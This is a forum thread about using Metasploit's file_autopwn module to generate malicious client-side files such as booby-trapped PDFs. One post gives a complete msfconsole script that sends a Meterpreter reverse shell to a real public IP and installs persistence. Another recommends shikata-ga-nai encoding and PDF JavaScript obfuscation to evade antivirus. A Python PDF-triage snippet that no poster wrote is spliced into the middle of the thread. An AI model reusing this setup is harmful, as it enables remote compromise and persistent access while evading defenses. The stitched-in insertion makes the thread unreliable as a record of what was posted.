Thread: Metasploit auxiliary file_autopwn module - Video Tutorial

  1. #1

    Metasploit auxiliary file_autopwn module - Video Tutorial

    hi,

    the relatively new msf 3 module auxiliary/server/file_autopwn is a very nice little feature to test all known file format client-side attacks.

    Using this script will provide you a web page with the relevant msf3 files, where you can perform all your client-side tests for known vulnerabilities.

    A quick video on how to set it up can be found here...
    http://zerohat.de/_shared_files/vide..._file_autopwn/

    /brtw2003

  2. #2
    Good friend of the forums | Join Date: Feb 2010 | Posts: 328

    Re: Metasploit auxiliary file_autopwn module - Video Tutorial

    [[solved]] The PDF I was using to inject was causing the error. Also, LPORT_WIN32 defaults to 3333 (the rev shell listen port). Not sure how to pass the "OnlyFiles" action, but whatever..
    NICe !

    I got no luck with
    windows_fileformat_adobe_pdf_embedded_exe_evil.pdf
    I tried it locally with BT4 prefinal/svn update and with a different msf host from my site:

    ( tried to replace localhost with my IP to a different host no luck )

    http://rmccurdy.com/scripts/msf_shells/out.txt

    I know the windows_fileformat_adobe_pdf_embedded_exe_evil.pdf works, so maybe I am missing something. It looks as though it is creating the files fine, but I get a DOS box popup with the file_autopwn and nothing in Wireshark?

    Code:
    rm -Rf /tmp/1 
    mkdir /tmp/1 
    rm -Rf ~/.msf3
    
    wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressReleases/Press%20Releases/nga10_02.pdf
    
    ./msfconsole
    
    db_driver sqlite3
    db_create pentest11
    setg LHOST 75.139.158.51
    setg LPORT 21
    setg SRVPORT 21
    setg LPORT_WIN32 21
    
    setg INFILENAME /tmp/file3.pdf
    
    
    use auxiliary/server/file_autopwn
    
    set OUTPATH /tmp/1
    
    set URIPATH /msf
    set SSL true
    set ExitOnSession false
    set PAYLOAD windows/meterpreter/reverse_tcp
    setg PAYLOAD windows/meterpreter/reverse_tcp
    set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
    run
    Last edited by opreat0r; 03-03-2010 at 08:06 PM.

  3. #3
    Just burned his ISO | Join Date: Jan 2010 | Posts: 16

    Re: Metasploit auxiliary file_autopwn module - Video Tutorial

    Great content. Will have to try it out.

    However, the video was extremely frustrating to watch with the video moving so much and missing so much of the scripts being shown and the commands being shown. If it could have just been full screen all the time without it zooming every 20 seconds it would have way more value for the person watching.

  4. #4

    Quote: Originally posted by jaykay232
    Great content. Will have to try it out.

    However, the video was extremely frustrating to watch with the video moving so much and missing so much of the scripts being shown and the commands being shown. If it could have just been full screen all the time without it zooming every 20 seconds it would have way more value for the person watching.

    Well, I'm not a big friend of sophisticated videos, nor explaining a step-by-step-i-m-super-l33t-hack$ng-guide; this info should be enough to start with and dive more into the amazing msf3 development... I know I zoomed too many times, but that's why there is a pause button...

    /brtw2003

    Quote: Originally posted by opreat0r
    NICe !

    I got no luck with
    windows_fileformat_adobe_pdf_embedded_exe_evil.pdf
    I tried it locally with BT4 prefinal/svn update and with a different msf host from my site:

    ( tried to replace localhost with my IP to a different host no luck )

    http://rmccurdy.com/scripts/msf_shells/out.txt

    I know the windows_fileformat_adobe_pdf_embedded_exe_evil.pdf works, so maybe I am missing something. It looks as though it is creating the files fine, but I get a DOS box popup with the file_autopwn and nothing in Wireshark?

    - Does your /tmp/file.pdf exist (you must use a real PDF document)?
    Be aware, currently there is also no obfuscation mechanism added, therefore payloads are easily detected by an up-to-date AV (run a simple for loop for all exe files and run msfencode with shikata-ga-nai)

    For PDF obfuscation, have a look around Didier Stevens' blog or compress the JS inside, like http://www.jslab.dk/tools.minify.php

    For more advanced options, start msf3, load file_autopwn and execute 'show advanced'

    /brtw2003
    Last edited by brtw2003; 03-02-2010 at 04:00 PM.
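
For the receiving side of the PDF discussion in this thread, an added example (not from any poster, and not Metasploit's or Didier Stevens' code): a small keyword triage in the style of pdfid that counts PDF names tied to launch actions, embedded files and JavaScript, decoding `#xx` name escapes first so a hex-escaped name is still counted. The keyword list and the `SAMPLE` bytes are constructed for illustration.

```python
import re

# Name keywords that PDF triage commonly flags (list chosen for this example).
SUSPICIOUS = ("/Launch", "/EmbeddedFile", "/JavaScript", "/JS", "/OpenAction", "/AA")

_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
# A PDF name runs from "/" up to the next whitespace or delimiter character.
_NAME = re.compile(rb"/[^\x00\t\n\x0c\r ()<>\[\]{}/%]+")

# Constructed sample: harmless bytes that only carry the names of interest.
SAMPLE = (
    b"%PDF-1.5\n"
    b"1 0 obj << /Type /Catalog /OpenAction 3 0 R /Names << /EmbeddedFiles 2 0 R >> >> endobj\n"
    b"2 0 obj << /Type /Filespec /F (form.pdf) /EF << /F 4 0 R >> >> endobj\n"
    b"3 0 obj << /S /L#61unch /F (placeholder) >> endobj\n"
    b"4 0 obj << /Type /EmbeddedFile /Length 0 >> stream\nendstream endobj\n"
)


def decode_name(raw: bytes) -> str:
    """Undo #xx hex escapes in a PDF name, e.g. /J#61vaScript -> /JavaScript."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")


def triage(pdf_bytes: bytes) -> dict:
    """Count suspicious names and how many of them were written with hex escapes."""
    counts = {k: 0 for k in SUSPICIOUS}
    obfuscated = 0
    for m in _NAME.finditer(pdf_bytes):
        raw = m.group(0)
        name = decode_name(raw)
        if name in counts:  # exact match, so /EmbeddedFiles is not /EmbeddedFile
            counts[name] += 1
            if b"#" in raw:  # an escaped keyword is itself worth reporting
                obfuscated += 1
    return {"counts": counts, "obfuscated": obfuscated, "suspicious": any(counts.values())}


if __name__ == "__main__":
    print(triage(SAMPLE))
```

This scans raw bytes only: names stored inside compressed object streams are not visible to it, so an empty result is not a clean verdict.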

  5. #5
    Good friend of the forums | Join Date: Feb 2010 | Posts: 328

    Re: Metasploit auxiliary file_autopwn module - Video Tutorial

    It was the PDF! I used the one in your example and it works (at least with pdf exe)

  6. #6
    Just burned his ISO | Join Date: Jan 2010 | Posts: 23

    Re: Metasploit auxiliary file_autopwn module - Video Tutorial

    Nice video / tutorial. Went ahead and gave this a whirl, used just about the same syntax as you, just different locations and such, and scripted it out. After running my script I get errors stating:
    Code:
    Exploit failed: SQLite3::SQLException: library routine called out of sequence: SELECT * FROM "workspaces" WHERE ("workspaces"."name" = 'default' ) LIMIT 1
    This continues on as it loops through all my file format exploits, when it gets to the end it comes back saying done, found 2 exploit modules, and launches the attack, starts up the folder where I can find vulnerabilities.

    I was reading around and it appears this happens if there are too many connections to the database going on at once. I followed your instructions on how to fix an error within Metasploit in regards to pools; doing that did not resolve this problem.

    Any help is appreciated.